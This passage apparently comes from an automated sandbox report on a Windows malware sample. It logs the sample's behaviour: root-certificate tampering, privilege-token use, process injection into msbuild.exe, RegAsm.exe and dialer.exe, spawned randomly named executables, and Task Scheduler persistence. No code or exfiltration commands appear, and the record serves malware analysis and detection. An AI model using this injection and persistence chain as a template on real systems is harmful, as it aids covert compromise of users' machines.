Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-222 = "Alaskan Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-215 = "Pacific Standard Time (Mexico)" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time" C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time" C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 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 C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 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 C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe N/A
N/A N/A C:\Users\Admin\Pictures\D5DiMuAoMYdqs3uIyHVh2vxp.exe N/A
N/A N/A C:\Users\Admin\Pictures\D5DiMuAoMYdqs3uIyHVh2vxp.exe N/A
N/A N/A C:\Users\Admin\Pictures\D5DiMuAoMYdqs3uIyHVh2vxp.exe N/A
N/A N/A C:\Users\Admin\Pictures\D5DiMuAoMYdqs3uIyHVh2vxp.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
N/A N/A C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
N/A N/A C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
N/A N/A C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
N/A N/A C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
N/A N/A C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
N/A N/A C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
N/A N/A C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
N/A N/A C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
N/A N/A C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
N/A N/A C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
N/A N/A C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
N/A N/A C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
N/A N/A C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
N/A N/A C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
N/A N/A C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
N/A N/A C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
N/A N/A C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
N/A N/A C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
N/A N/A C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
N/A N/A C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
N/A N/A C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
N/A N/A C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
N/A N/A C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
N/A N/A C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
N/A N/A C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
N/A N/A C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
N/A N/A C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
N/A N/A C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
N/A N/A C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
N/A N/A C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\u2zg.1.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4932 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4932 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4932 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4932 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4932 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4932 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4932 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4932 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4932 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4932 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 4932 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 576 wrote to memory of 3868 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\YTL0PmmS83SCp78qfDgfizjt.exe
PID 576 wrote to memory of 3868 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\YTL0PmmS83SCp78qfDgfizjt.exe
PID 576 wrote to memory of 3868 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\YTL0PmmS83SCp78qfDgfizjt.exe
PID 576 wrote to memory of 1164 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe
PID 576 wrote to memory of 1164 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe
PID 576 wrote to memory of 1164 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe
PID 576 wrote to memory of 4996 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Windows\SysWOW64\forfiles.exe
PID 576 wrote to memory of 4996 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Windows\SysWOW64\forfiles.exe
PID 576 wrote to memory of 4996 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Windows\SysWOW64\forfiles.exe
PID 576 wrote to memory of 3156 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe
PID 576 wrote to memory of 3156 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe
PID 576 wrote to memory of 3156 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe
PID 576 wrote to memory of 4568 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe
PID 576 wrote to memory of 4568 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe
PID 576 wrote to memory of 4568 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe
PID 576 wrote to memory of 3752 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\D5DiMuAoMYdqs3uIyHVh2vxp.exe
PID 576 wrote to memory of 3752 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\D5DiMuAoMYdqs3uIyHVh2vxp.exe
PID 576 wrote to memory of 3752 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\D5DiMuAoMYdqs3uIyHVh2vxp.exe
PID 3156 wrote to memory of 3940 N/A C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe C:\Windows\System32\Conhost.exe
PID 3156 wrote to memory of 3940 N/A C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe C:\Windows\System32\Conhost.exe
PID 3156 wrote to memory of 3940 N/A C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe C:\Windows\System32\Conhost.exe
PID 3156 wrote to memory of 3208 N/A C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3156 wrote to memory of 3208 N/A C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3156 wrote to memory of 3208 N/A C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3156 wrote to memory of 3208 N/A C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3156 wrote to memory of 3208 N/A C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3156 wrote to memory of 3208 N/A C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3156 wrote to memory of 3208 N/A C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3156 wrote to memory of 3208 N/A C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3156 wrote to memory of 3208 N/A C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3156 wrote to memory of 3208 N/A C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3156 wrote to memory of 3208 N/A C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3868 wrote to memory of 1308 N/A C:\Users\Admin\Pictures\YTL0PmmS83SCp78qfDgfizjt.exe C:\Windows\system32\cmd.exe
PID 3868 wrote to memory of 1308 N/A C:\Users\Admin\Pictures\YTL0PmmS83SCp78qfDgfizjt.exe C:\Windows\system32\cmd.exe
PID 3868 wrote to memory of 1308 N/A C:\Users\Admin\Pictures\YTL0PmmS83SCp78qfDgfizjt.exe C:\Windows\system32\cmd.exe
PID 3868 wrote to memory of 3396 N/A C:\Users\Admin\Pictures\YTL0PmmS83SCp78qfDgfizjt.exe C:\Users\Admin\AppData\Local\Temp\u2zg.1.exe
PID 3868 wrote to memory of 3396 N/A C:\Users\Admin\Pictures\YTL0PmmS83SCp78qfDgfizjt.exe C:\Users\Admin\AppData\Local\Temp\u2zg.1.exe
PID 3868 wrote to memory of 3396 N/A C:\Users\Admin\Pictures\YTL0PmmS83SCp78qfDgfizjt.exe C:\Users\Admin\AppData\Local\Temp\u2zg.1.exe
PID 576 wrote to memory of 3460 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe
PID 576 wrote to memory of 3460 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe
PID 576 wrote to memory of 3460 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe
PID 3208 wrote to memory of 2380 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\dialer.exe
PID 3208 wrote to memory of 2380 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\dialer.exe
PID 3208 wrote to memory of 2380 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\dialer.exe
PID 3208 wrote to memory of 2380 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\dialer.exe
PID 3208 wrote to memory of 2380 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\dialer.exe
PID 3460 wrote to memory of 1808 N/A C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe
PID 3460 wrote to memory of 1808 N/A C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe
PID 3460 wrote to memory of 1808 N/A C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe
PID 3460 wrote to memory of 4412 N/A C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\b04vaIYl7t9GKnLT4gGKsr1W.exe
PID 3460 wrote to memory of 4412 N/A C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\b04vaIYl7t9GKnLT4gGKsr1W.exe
PID 3460 wrote to memory of 4412 N/A C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\b04vaIYl7t9GKnLT4gGKsr1W.exe
PID 3460 wrote to memory of 2892 N/A C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe

"C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"

C:\Users\Admin\Pictures\YTL0PmmS83SCp78qfDgfizjt.exe

"C:\Users\Admin\Pictures\YTL0PmmS83SCp78qfDgfizjt.exe"

C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe

"C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe"

C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe

"C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe"

C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe

"C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe"

C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe

"C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe"

C:\Users\Admin\Pictures\D5DiMuAoMYdqs3uIyHVh2vxp.exe

"C:\Users\Admin\Pictures\D5DiMuAoMYdqs3uIyHVh2vxp.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3156 -ip 3156

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 864

C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe

"C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe"

C:\Users\Admin\AppData\Local\Temp\u2zg.1.exe

"C:\Users\Admin\AppData\Local\Temp\u2zg.1.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3868 -ip 3868

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 1172

C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe

"C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe" --silent --allusers=0

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3208 -ip 3208

C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe

